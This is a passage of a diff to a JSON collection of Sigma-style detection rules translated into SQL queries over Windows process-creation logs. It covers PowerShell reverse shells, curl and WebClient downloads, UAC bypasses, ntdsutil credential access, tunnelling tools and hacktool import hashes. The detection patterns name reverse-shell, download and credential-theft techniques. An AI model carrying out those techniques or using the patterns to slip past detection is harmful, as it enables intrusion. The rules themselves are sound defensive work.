OriginalFileName = 'tasklist.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-LocalGroupMember %' ESCAPE '\\' AND 
(CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tasklist_basic_execution.yml" + "filename": "proc_creation_win_powershell_get_localgroup_member_recon.yml" }, { - "title": "Potential Powershell ReverseShell Connection", - "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", - "status": "stable", - "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell.", - "author": "FPT.EagleEye, wagga", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrative might use this function to check network connectivity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% System.Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetBytes%' ESCAPE '\\' AND CommandLine LIKE '%.Write%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Shell32 DLL Execution in Suspicious Directory", - "id": "32b96012-7892-429e-b26c-ac2bf46066ff", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName 
= 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_shell32_susp_execution.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Suspicious Hacktool Execution - Imphash", - "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "title": "File Download Via Curl.EXE", + "id": "9a517fca-4ba3-4629-9278-a68694697b81", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "description": "Detects file download using curl.exe", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of one of these tools" + "Scripts created by developers and admins", + "Administrative activity", + "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', 
'1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', 
'38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE 
'\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_execution_via_imphashes.yml" + "filename": "proc_creation_win_curl_download.yml" }, { - "title": "Suspicious Rundll32 Script in CommandLine", - "id": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "status": "experimental", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "frack113, Zaw Min Htun (ZETA)", + "title": "Remote 
Access Tool - AnyDesk Execution", + "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32%' ESCAPE '\\' AND (CommandLine LIKE '%mshtml,RunHTMLApplication%' ESCAPE '\\' OR CommandLine LIKE '%mshtml,#135%' ESCAPE '\\') AND (CommandLine LIKE '%javascript:%' ESCAPE '\\' OR CommandLine LIKE '%vbscript:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" ], - "filename": "proc_creation_win_rundll32_script_run.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk.yml" }, { - "title": "Lolbin Runexehelper Use As Proxy", - "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "title": "Group Membership Reconnaissance Via Whoami.EXE", + "id": "bd8b828d-0dca-48e1-8a63-8a58ecf2644f", "status": "experimental", - "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other 
programs", - "author": "frack113", + "description": "Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /groups%' ESCAPE '\\' OR CommandLine LIKE '% -groups%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runexehelper.yml" + "filename": "proc_creation_win_whoami_groups_discovery.yml" }, { - "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", - "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", - "status": "test", - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", - "author": "Thomas Patzke", + "title": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "a58353df-af43-4753-bad0-cd83ef35eef5", + "status": "experimental", + "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", "attack.t1003.003" ], "falsepositives": [ - "NTDS maintenance" + "Legitimate usage to restore snapshots", + "Legitimate admin activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel 
= 'Security') AND (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR OriginalFileName = 'ntdsutil.exe') AND ((CommandLine LIKE '%snapshot%' ESCAPE '\\' AND CommandLine LIKE '%mount %' ESCAPE '\\') OR (CommandLine LIKE '%ac%' ESCAPE '\\' AND CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% ntds%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ntdsutil_usage.yml" + "filename": "proc_creation_win_ntdsutil_susp_usage.yml" }, { - "title": "Potential Snatch Ransomware Activity", - "id": "5325945e-f1f0-406e-97b8-65104d393fff", - "status": "stable", - "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + ], + "filename": "proc_creation_win_hktl_sharp_chisel.yml" + }, + { + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ - "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 
'%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_snatch_ransomware.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "Proxy Execution Via Explorer.exe", - "id": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "status": "test", - "description": "Attackers can use explorer.exe for evading defense mechanisms", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", + "status": "experimental", + "description": "Detects use of chcp to look up the system locale value as part of host discovery", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1614.001" ], "falsepositives": [ - "Legitimate explorer.exe run from cmd.exe" + "During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command." 
], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%explorer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /c %' ESCAPE '\\' OR ParentCommandLine LIKE '% /r %' ESCAPE '\\' OR ParentCommandLine LIKE '% /k %' ESCAPE '\\') AND NewProcessName LIKE '%\\\\chcp.com' ESCAPE '\\' AND (CommandLine LIKE '%chcp' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\' OR CommandLine LIKE '%chcp ' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_lolbin_execution.yml" + "filename": "proc_creation_win_chcp_codepage_lookup.yml" }, { - "title": "UAC Bypass via Event Viewer", - "id": "be344333-921d-4c4d-8bb8-e584cf584780", - "status": "test", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Node Process Executions", + "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "status": "experimental", + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "author": "Max Altgelt (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1127", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = 
